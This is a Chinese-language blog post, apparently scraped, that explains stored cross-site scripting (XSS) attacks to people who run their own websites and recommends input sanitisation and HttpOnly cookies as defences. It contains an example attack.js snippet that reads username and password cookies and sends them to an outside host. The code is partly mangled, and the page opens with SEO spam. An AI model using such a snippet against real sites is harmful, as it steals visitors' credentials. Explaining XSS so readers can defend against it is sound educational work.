做个人博客的网站,跨境经验分享,建网站找我,门户网站开发工具title: XSS攻击
date: 2023-08-27 19:15:57
tags: [XSS, 网络安全]
categories: 网络安全 今天学习了一个网络攻击的手段#xff0c;XSS攻击技术#xff0c;大家自建网站的朋友#xff0c;记得看看是否有此漏洞。 #x1f388; XSS 攻击 全称跨站脚本攻击 Cross Site Sc…
title: XSS攻击
date: 2023-08-27 19:15:57
tags: [XSS, 网络安全]
categories: 网络安全 今天学习了一个网络攻击的手段XSS攻击技术大家自建网站的朋友记得看看是否有此漏洞。 XSS 攻击 全称跨站脚本攻击 Cross Site Scripting。 为了与重叠样式表 CSS 进行区分所以换了另一个缩写名称 XSS。 XSS攻击者通过篡改网页注入恶意的 HTML 脚本一般是 javascript在用户浏览网页时控制用户浏览器进行恶意操作的一种攻击方式。 XSS 攻击经常使用在论坛博客等应用中。攻击者可以偷取用户Cookie、密码等重要数据进而伪造交易、盗取用户财产、窃取情报等私密信息。 就像上图如果用户在评论框中输入的并不是正常的文本而是一段 javascript 脚本而后台又没对该用户的数据进行处理直接存入数据库那么当其他用户过来访问该页面浏览器必然会执行这段脚本 当然这只是恶趣味而真正的黑客并不会仅仅满足这样的恶趣味可能更多的是想通过这些 注入脚本获取你的 个人信息 甚至是你的账号密码等信息。 由上图可知用户其实在评论的时候引入了一个第三方脚本在这个脚本中获取你浏览器的 cookie 信息并发送到指定的接口进行保存处理这样你的信息就已经泄露了: // attack.js 中的逻辑
var uname $.cookie(username); // 获取账号
var pwd $.cookie(password); // 获取密码// 发送请求
$(body).appendTo(script srchttp://autofelix.com/index.php?username${uname}password${pwd}/script);
在上面逻辑中脚本中获取了你的个人信息并将你的个人信息发送到后端 php 文件中进行处理保存这样你的个人信息就已经泄露了所以杜绝 xss攻击 在网络安全中非常的重要 所以后端永远不要相信用户提交的数据在接收用户提交的信息时候要进行 消毒处理 也就是过滤一些特殊的字符比如 javascript 脚本中的 进行转移 再进行存储这样就能有效的进行 xss 攻击的预防 另外如果 cookie 中设置了 HttpOnly 属性那么通过 js 脚本将无法读取到cookie 信息这样也能有效的防止 XSS 攻击窃取 cookie 内容 好记性不如烂笔头。
